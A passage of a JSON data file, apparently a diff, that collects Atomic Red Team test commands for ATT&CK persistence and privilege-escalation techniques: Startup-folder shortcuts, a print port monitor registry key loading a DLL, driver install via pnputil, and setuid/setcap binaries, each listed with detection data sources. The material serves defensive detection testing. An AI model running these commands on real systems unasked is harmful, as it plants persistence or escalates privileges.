Menu\\Programs\\Startup\\T1547.009.lnk\")\n$ShortCut.TargetPath=\"cmd.exe\"\n$ShortCut.WorkingDirectory = \"C:\\Windows\\System32\";\n$ShortCut.WindowStyle = 1;\n$ShortCut.Description = \"T1547.009.\";\n$ShortCut.Save()\n\n$Shell = New-Object -ComObject (\"WScript.Shell\")\n$ShortCut = $Shell.CreateShortcut(\"$env:ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\T1547.009.lnk\")\n$ShortCut.TargetPath=\"cmd.exe\"\n$ShortCut.WorkingDirectory = \"C:\\Windows\\System32\";\n$ShortCut.WindowStyle = 1;\n$ShortCut.Description = \"T1547.009.\";\n$ShortCut.Save()\n" + ], + "commands": [ + { + "command": "echo [InternetShortcut] > %temp%\\T1547.009_modified_shortcut.url\necho URL=C:\\windows\\system32\\calc.exe >> %temp%\\T1547.009_modified_shortcut.url\n%temp%\\T1547.009_modified_shortcut.url\n", + "source": "atomics/T1547.009/T1547.009.yaml", + "name": "Atomic Red Team Test - Boot or Logon Autostart Execution: Shortcut Modification" + }, + { + "command": "$Shell = New-Object -ComObject (\"WScript.Shell\")\n$ShortCut = $Shell.CreateShortcut(\"$env:APPDATA\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\T1547.009.lnk\")\n$ShortCut.TargetPath=\"cmd.exe\"\n$ShortCut.WorkingDirectory = \"C:\\Windows\\System32\";\n$ShortCut.WindowStyle = 1;\n$ShortCut.Description = \"T1547.009.\";\n$ShortCut.Save()\n\n$Shell = New-Object -ComObject (\"WScript.Shell\")\n$ShortCut = $Shell.CreateShortcut(\"$env:ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\T1547.009.lnk\")\n$ShortCut.TargetPath=\"cmd.exe\"\n$ShortCut.WorkingDirectory = \"C:\\Windows\\System32\";\n$ShortCut.WindowStyle = 1;\n$ShortCut.Description = \"T1547.009.\";\n$ShortCut.Save()\n", + "source": "atomics/T1547.009/T1547.009.yaml", + "name": "Atomic Red Team Test - Boot or Logon Autostart Execution: Shortcut Modification" + } + ], + "parsed_datasets": [ + { + "attack_technique": "T1547.009", + "display_name": "Boot or Logon Autostart Execution: Shortcut Modification", + "atomic_tests": [ + { + "name": "Shortcut Modification", + "auto_generated_guid": "ce4fc678-364f-4282-af16-2fb4c78005ce", + "description": "This test to simulate shortcut modification and then execute. example shortcut (*.lnk , .url) strings check with powershell;\ngci -path \"C:\\Users\" -recurse -include *.url -ea SilentlyContinue | Select-String -Pattern \"exe\" | FL.\nUpon execution, calc.exe will be launched.\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "shortcut_file_path": { + "description": "shortcut modified and execute", + "type": "Path", + "default": "%temp%\\T1547.009_modified_shortcut.url" + } + }, + "executor": { + "command": "echo [InternetShortcut] > #{shortcut_file_path}\necho URL=C:\\windows\\system32\\calc.exe >> #{shortcut_file_path}\n#{shortcut_file_path}\n", + "cleanup_command": "del -f #{shortcut_file_path} >nul 2>&1\n", + "name": "command_prompt" + } + }, + { + "name": "Create shortcut to cmd in startup folders", + "auto_generated_guid": "cfdc954d-4bb0-4027-875b-a1893ce406f2", + "description": "LNK file to launch CMD placed in startup folder. Upon execution, open File Explorer and browse to \"%APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\\"\nto view the new shortcut.\n", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "$Shell = New-Object -ComObject (\"WScript.Shell\")\n$ShortCut = $Shell.CreateShortcut(\"$env:APPDATA\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\T1547.009.lnk\")\n$ShortCut.TargetPath=\"cmd.exe\"\n$ShortCut.WorkingDirectory = \"C:\\Windows\\System32\";\n$ShortCut.WindowStyle = 1;\n$ShortCut.Description = \"T1547.009.\";\n$ShortCut.Save()\n\n$Shell = New-Object -ComObject (\"WScript.Shell\")\n$ShortCut = $Shell.CreateShortcut(\"$env:ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\T1547.009.lnk\")\n$ShortCut.TargetPath=\"cmd.exe\"\n$ShortCut.WorkingDirectory = \"C:\\Windows\\System32\";\n$ShortCut.WindowStyle = 1;\n$ShortCut.Description = \"T1547.009.\";\n$ShortCut.Save()\n", + "cleanup_command": "Remove-Item \"$env:APPDATA\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\T1547.009.lnk\" -ErrorAction Ignore\nRemove-Item \"$env:ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\T1547.009.lnk\" -ErrorAction Ignore\n", + "name": "powershell", + "elevation_required": true + } + } + ] + } + ], + "queries": [], + "possible_detections": [ + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file creation", + "description": "A file was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file modification", + "description": "A file was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file modification", + "description": "A file was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "file" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "thread" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-management", + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-streams", + "https://docs.microsoft.com/en-us/troubleshoot/windows-client/backup-and-storage/fat-hpfs-and-ntfs-file-systems" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ] + ] + }, + { + "technique_id": "T1547.010", + "command_list": [ + "reg add \"hklm\\system\\currentcontrolset\\control\\print\\monitors\\ART\" /v \"Atomic Red Team\" /d \"C:\\Path\\AtomicRedTeam.dll\" /t REG_SZ\n" + ], + "commands": [ + { + "command": "reg add \"hklm\\system\\currentcontrolset\\control\\print\\monitors\\ART\" /v \"Atomic Red Team\" /d \"C:\\Path\\AtomicRedTeam.dll\" /t REG_SZ\n", + "source": "atomics/T1547.010/T1547.010.yaml", + "name": "Atomic Red Team Test - Boot or Logon Autostart Execution: Port Monitors" + } + ], + "parsed_datasets": [ + { + "attack_technique": "T1547.010", + "display_name": "Boot or Logon Autostart Execution: Port Monitors", + "atomic_tests": [ + { + "name": "Add Port Monitor persistence in Registry", + "auto_generated_guid": "d34ef297-f178-4462-871e-9ce618d44e50", + "description": "Add key-value pair to a Windows Port Monitor registry. On the subsequent reboot dll will be execute under spoolsv with NT AUTHORITY/SYSTEM privilege.", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "monitor_dll": { + "description": "Addition to port monitor registry key. Normally refers to a DLL name in C:\\Windows\\System32. arbitrary DLL can be loaded if permissions allow writing a fully-qualified pathname for that DLL.", + "type": "Path", + "default": "C:\\Path\\AtomicRedTeam.dll" + } + }, + "executor": { + "command": "reg add \"hklm\\system\\currentcontrolset\\control\\print\\monitors\\ART\" /v \"Atomic Red Team\" /d \"#{monitor_dll}\" /t REG_SZ\n", + "cleanup_command": "reg delete \"hklm\\system\\currentcontrolset\\control\\print\\monitors\\ART\" /f >nul 2>&1\n", + "name": "command_prompt", + "elevation_required": true + } + } + ] + } + ], + "queries": [], + "possible_detections": [ + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file creation", + "description": "A file was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "file" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "os api execution", + "description": "A process executed operating system api functions.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "api call" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "os api execution", + "description": "A process executed operating system api functions.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "system call" + }, + { + "data_source": "module", + "definition": "Information about module files consisting of one or more classes and interfaces, such as portable executable (PE) format executables/dynamic link libraries (DLL), executable and linkable format (ELF) executables/shared libraries, and Mach-O format executables/shared libraries.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "module load", + "description": "A module was loaded into a process.", + "source_data_element": "process", + "relationship": "loaded", + "target_data_element": "module" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key modification", + "description": "A registry key was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "windows registry key" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key modification", + "description": "A registry key was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "windows registry key value" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key modification", + "description": "A registry key was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "windows registry key" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key modification", + "description": "A registry key was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "windows registry key value" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-management", + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-streams", + "https://docs.microsoft.com/en-us/troubleshoot/windows-client/backup-and-storage/fat-hpfs-and-ntfs-file-systems" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/api/libloaderapi/nf-libloaderapi-loadlibrarya", + "https://docs.microsoft.com/en-us/dotnet/api/system.reflection.module?view=netcore-3.1", + "https://docs.microsoft.com/en-us/windows/win32/debug/pe-format", + "https://elinux.org/Executable_and_Linkable_Format_(ELF)" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/sysinfo/registry" + ] + ] + }, + { + "technique_id": "T1547.011", + "command_list": [], + "commands": [], + "parsed_datasets": [ + { + "attack_technique": "T1547.011", + "display_name": "Boot or Logon Autostart Execution: Plist Modification", + "atomic_tests": [ + { + "name": "Plist Modification", + "auto_generated_guid": "394a538e-09bb-4a4a-95d1-b93cf12682a8", + "description": "Modify MacOS plist file in one of two directories\n", + "supported_platforms": [ + "macos" + ], + "executor": { + "steps": "1. Modify a .plist in\n\n /Library/Preferences\n\n OR\n\n ~/Library/Preferences\n\n2. Subsequently, follow the steps for adding and running via [Launch Agent](Persistence/Launch_Agent.md)\n", + "name": "manual" + } + } + ] + } + ], + "queries": [], + "possible_detections": [ + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file creation", + "description": "A file was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file modification", + "description": "A file was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file modification", + "description": "A file was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "file" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "thread" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-management", + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-streams", + "https://docs.microsoft.com/en-us/troubleshoot/windows-client/backup-and-storage/fat-hpfs-and-ntfs-file-systems" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ] + ] + }, + { + "technique_id": "T1547", + "command_list": [ + "pnputil.exe /add-driver \"C:\\Windows\\INF\\usbstor.inf\"\n" + ], + "commands": [ + { + "command": "pnputil.exe /add-driver \"C:\\Windows\\INF\\usbstor.inf\"\n", + "source": "atomics/T1547/T1547.yaml", + "name": "Atomic Red Team Test - Boot or Logon Autostart Execution" + } + ], + "parsed_datasets": [ + { + "attack_technique": "T1547", + "display_name": "Boot or Logon Autostart Execution", + "atomic_tests": [ + { + "name": "Add a driver", + "auto_generated_guid": "cb01b3da-b0e7-4e24-bf6d-de5223526785", + "description": "Install a driver via pnputil.exe lolbin\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "driver_inf": { + "description": "A built-in, already installed windows driver inf", + "type": "Path", + "default": "C:\\Windows\\INF\\usbstor.inf" + } + }, + "executor": { + "command": "pnputil.exe /add-driver \"#{driver_inf}\"\n", + "name": "command_prompt" + } + } + ] + } + ], + "queries": [], + "possible_detections": [ + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file creation", + "description": "A file was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "file" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key creation", + "description": "A registry key was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "windows registry key" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key creation", + "description": "A registry key was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "windows registry key value" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key modification", + "description": "A registry key was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "windows registry key" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key modification", + "description": "A registry key was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "windows registry key value" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key modification", + "description": "A registry key was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "windows registry key" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key modification", + "description": "A registry key was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "windows registry key value" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file modification", + "description": "A file was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file modification", + "description": "A file was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "file" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "thread" + }, + { + "data_source": "module", + "definition": "Information about module files consisting of one or more classes and interfaces, such as portable executable (PE) format executables/dynamic link libraries (DLL), executable and linkable format (ELF) executables/shared libraries, and Mach-O format executables/shared libraries.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "module load", + "description": "A module was loaded into a process.", + "source_data_element": "process", + "relationship": "loaded", + "target_data_element": "module" + }, + { + "data_source": "kernel", + "definition": "Information associated with the operating system kernel of a host.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Linux", + "macOS" + ], + "data_component": "kernel module load", + "description": "A kernel module was loaded on a host.", + "source_data_element": "process", + "relationship": "loaded", + "target_data_element": "kernel module" + }, + { + "data_source": "driver", + "definition": "Information associated with device drivers, or computer programs that operate or control a particular type of device that is attached to a computer.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Linux", + "macOS", + "Windows" + ], + "data_component": "driver load", + "description": "A driver (User-mode, kernel-mode) was loaded.", + "source_data_element": "process", + "relationship": "loaded", + "target_data_element": "driver" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "os api execution", + "description": "A process executed operating system api functions.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "api call" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "os api execution", + "description": "A process executed operating system api functions.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "system call" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-management", + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-streams", + "https://docs.microsoft.com/en-us/troubleshoot/windows-client/backup-and-storage/fat-hpfs-and-ntfs-file-systems" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/sysinfo/registry" + ], + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/api/libloaderapi/nf-libloaderapi-loadlibrarya", + "https://docs.microsoft.com/en-us/dotnet/api/system.reflection.module?view=netcore-3.1", + "https://docs.microsoft.com/en-us/windows/win32/debug/pe-format", + "https://elinux.org/Executable_and_Linkable_Format_(ELF)" + ], + [ + "https://www.stigviewer.com/stig/oracle_linux_5/2016-12-20/finding/V-22383", + "https://man7.org/linux/man-pages/man2/init_module.2.html" + ], + [ + "https://developer.apple.com/library/archive/documentation/DeviceDrivers/Conceptual/IOKitFundamentals/Features/Features.html", + "https://docs.microsoft.com/en-us/windows-hardware/drivers/gettingstarted/user-mode-and-kernel-mode" + ] + ] + }, + { + "technique_id": "T1548.001", + "command_list": [ + "cp PathToAtomicsFolder/T1548.001/src/hello.c /tmp/hello.c\nsudo chown root /tmp/hello.c\nsudo make /tmp/hello\nsudo chown root /tmp/hello\nsudo chmod u+s /tmp/hello\n/tmp/hello\n", + "sudo touch /tmp/evilBinary\nsudo chown root /tmp/evilBinary\nsudo chmod u+s /tmp/evilBinary\n", + "sudo touch /tmp/evilBinary\nsudo chown root /tmp/evilBinary\nsudo chmod g+s /tmp/evilBinary\n", + "cp PathToAtomicsFolder/T1548.001/src/cap.c /tmp/cap.c\nmake /tmp/cap\nsudo setcap cap_setuid=ep /tmp/cap\n/tmp/cap\n", + "touch /tmp/evilBinary\nsudo setcap cap_setuid=ep /tmp/evilBinary\n" + ], + "commands": [ + { + "command": "cp PathToAtomicsFolder/T1548.001/src/hello.c /tmp/hello.c\nsudo chown root /tmp/hello.c\nsudo make /tmp/hello\nsudo chown root /tmp/hello\nsudo chmod u+s /tmp/hello\n/tmp/hello\n", + "source": "atomics/T1548.001/T1548.001.yaml", + "name": "Atomic Red Team Test - Abuse Elevation Control Mechanism: Setuid and Setgid" + }, + { + "command": "sudo touch /tmp/evilBinary\nsudo chown root /tmp/evilBinary\nsudo chmod u+s /tmp/evilBinary\n", + "source": "atomics/T1548.001/T1548.001.yaml", + "name": "Atomic Red Team Test - Abuse Elevation Control Mechanism: Setuid and Setgid" + }, + { + "command": "sudo touch /tmp/evilBinary\nsudo chown root /tmp/evilBinary\nsudo chmod g+s /tmp/evilBinary\n", + "source": "atomics/T1548.001/T1548.001.yaml", + "name": "Atomic Red Team Test - Abuse Elevation Control Mechanism: Setuid and Setgid" + }, + { + "command": "cp PathToAtomicsFolder/T1548.001/src/cap.c /tmp/cap.c\nmake /tmp/cap\nsudo setcap cap_setuid=ep /tmp/cap\n/tmp/cap\n", + "source": "atomics/T1548.001/T1548.001.yaml", + "name": "Atomic Red Team Test - Abuse Elevation Control Mechanism: Setuid and Setgid" + }, + { + "command": "touch /tmp/evilBinary\nsudo setcap cap_setuid=ep /tmp/evilBinary\n", + "source": "atomics/T1548.001/T1548.001.yaml", + "name": "Atomic Red Team Test - Abuse Elevation Control Mechanism: Setuid and Setgid" + } + ], + "parsed_datasets": [ + { + "attack_technique": "T1548.001", + "display_name": "Abuse Elevation Control Mechanism: Setuid and Setgid", + "atomic_tests": [ + { + "name": "Make and modify binary from C source", + "auto_generated_guid": "896dfe97-ae43-4101-8e96-9a7996555d80", + "description": "Make, change owner, and change file attributes on a C source code file\n", + "supported_platforms": [ + "macos", + "linux" + ], + "input_arguments": { + "payload": { + "description": "hello.c payload", + "type": "Path", + "default": "PathToAtomicsFolder/T1548.001/src/hello.c" + } + }, + "executor": { + "command": "cp #{payload} /tmp/hello.c\nsudo chown root /tmp/hello.c\nsudo make /tmp/hello\nsudo chown root /tmp/hello\nsudo chmod u+s /tmp/hello\n/tmp/hello\n", + "cleanup_command": "sudo rm /tmp/hello\nsudo rm /tmp/hello.c\n", + "name": "sh", + "elevation_required": true + } + }, + { + "name": "Set a SetUID flag on file", + "auto_generated_guid": "759055b3-3885-4582-a8ec-c00c9d64dd79", + "description": "This test sets the SetUID flag on a file in Linux and macOS.\n", + "supported_platforms": [ + "macos", + "linux" + ], + "input_arguments": { + "file_to_setuid": { + "description": "Path of file to set SetUID flag", + "type": "Path", + "default": "/tmp/evilBinary" + } + }, + "executor": { + "command": "sudo touch #{file_to_setuid}\nsudo chown root #{file_to_setuid}\nsudo chmod u+s #{file_to_setuid}\n", + "cleanup_command": "sudo rm #{file_to_setuid}\n", + "name": "sh", + "elevation_required": true + } + }, + { + "name": "Set a SetGID flag on file", + "auto_generated_guid": "db55f666-7cba-46c6-9fe6-205a05c3242c", + "description": "This test sets the SetGID flag on a file in Linux and macOS.\n", + "supported_platforms": [ + "macos", + "linux" + ], + "input_arguments": { + "file_to_setuid": { + "description": "Path of file to set SetGID flag", + "type": "Path", + "default": "/tmp/evilBinary" + } + }, + "executor": { + "command": "sudo touch #{file_to_setuid}\nsudo chown root #{file_to_setuid}\nsudo chmod g+s #{file_to_setuid}\n", + "cleanup_command": "sudo rm #{file_to_setuid}\n", + "name": "sh", + "elevation_required": true + } + }, + { + "name": "Make and modify capabilities of a binary", + "auto_generated_guid": "db53959c-207d-4000-9e7a-cd8eb417e072", + "description": "Make and modify [capabilities](https://man7.org/linux/man-pages/man7/capabilities.7.html) of a C source code file.\nThe binary doesn't have to modify the UID, but the binary is given the capability to arbitrarily modify it at any time with `setuid(0)`.\nWithout being owned by root, the binary can set the UID to 0.\n", + "supported_platforms": [ + "linux" + ], + "input_arguments": { + "payload": { + "description": "cap.c payload", + "type": "Path", + "default": "PathToAtomicsFolder/T1548.001/src/cap.c" + } + }, + "executor": { + "command": "cp #{payload} /tmp/cap.c\nmake /tmp/cap\nsudo setcap cap_setuid=ep /tmp/cap\n/tmp/cap\n", + "cleanup_command": "rm /tmp/cap\nrm /tmp/cap.c\n", + "name": "sh", + "elevation_required": true + } + }, + { + "name": "Provide the SetUID capability to a file", + "auto_generated_guid": "1ac3272f-9bcf-443a-9888-4b1d3de785c1", + "description": "This test gives a file the capability to set UID without using flags.\n", + "supported_platforms": [ + "linux" + ], + "input_arguments": { + "file_to_setcap": { + "description": "Path of file to provide the SetUID capability", + "type": "Path", + "default": "/tmp/evilBinary" + } + }, + "executor": { + "command": "touch #{file_to_setcap}\nsudo setcap cap_setuid=ep #{file_to_setcap}\n", + "cleanup_command": "rm #{file_to_setcap}\n", + "name": "sh", + "elevation_required": true + } + } + ] + } + ], + "queries": [], + "possible_detections": [ + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + 